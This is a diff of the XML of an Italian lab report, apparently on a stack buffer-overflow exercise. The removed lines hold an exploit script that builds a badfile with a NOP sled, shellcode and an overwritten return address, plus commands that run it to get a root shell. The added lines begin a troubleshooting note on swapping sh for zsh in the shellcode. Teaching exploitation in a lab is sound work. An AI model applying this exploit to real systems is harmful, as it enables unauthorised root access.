               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve">0x90 for </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>i</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> in range(300)) </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t># Put the shellcode at the end</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">start = 300 - </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>len</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(shellcode) </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">content[start:] = shellcode </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t># Put the address at offset 112</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">ret = 0xbfffeaf8 + 120 </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>content[</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>112:116] = (ret).</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>to_bytes</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(4,byteorder=’little’) </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t># Write the content to a file</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">with </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>open(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>’</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>badfile</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>’, ’</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>wb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">’) as f: </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-GB"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">        </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>f.write</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>(content)</w:t>
+              <w:t xml:space="preserve">/stack </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8553,217 +9054,148 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:kern w:val="3"/>
           <w:sz w:val="28"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-      </w:pPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">g) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:kern w:val="3"/>
           <w:sz w:val="28"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>Risoluzione</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:kern w:val="3"/>
           <w:sz w:val="28"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-      </w:pPr>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:kern w:val="3"/>
           <w:sz w:val="28"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">f) </w:t>
-      </w:r>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>problemi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:kern w:val="3"/>
           <w:sz w:val="28"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>Eseguire il programma vulnerabile</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A questo punto si può quindi eseguire lo script </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">exploit.py </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">per andare a generare </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">il nuovo </w:t>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Se il programma funziona correttamente </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ma l</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a shell di </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>badfile</w:t>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>comand</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">Come prima cosa è necessario dare i permessi di esecuzione allo script, dopo di che si elimina il vecchio </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>badfile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e si eseguire lo script Python.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ora tutto è pronto per eseguire il programma C contente l’attacco di tipo BO che, se correttamente implementato, dovrebbe aprire una shell di </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t>comand</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ROOT, permettendo all’attaccante innumerevoli azioni malevoli sul computer ospite.</w:t>
-      </w:r>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">che si apre al termine dell’esecuzione </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>non è ROOT:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Standard"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -8802,120 +9234,35 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve">$ </w:t>
+              <w:t>change "\x68""//</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>chmod</w:t>
+              <w:t>sh</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t>" to "\x68""/</w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t>u+x</w:t>
+              <w:t>zsh</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve"> exploit.py </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">$ rm </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>badfile</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">$ exploit.py </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Standard"/>
-              <w:spacing w:line="276" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>$ .</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">/stack </w:t>
+              <w:t>"</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8923,93 +9270,11 @@
     </w:tbl>
     <w:p>
       <w:pPr>
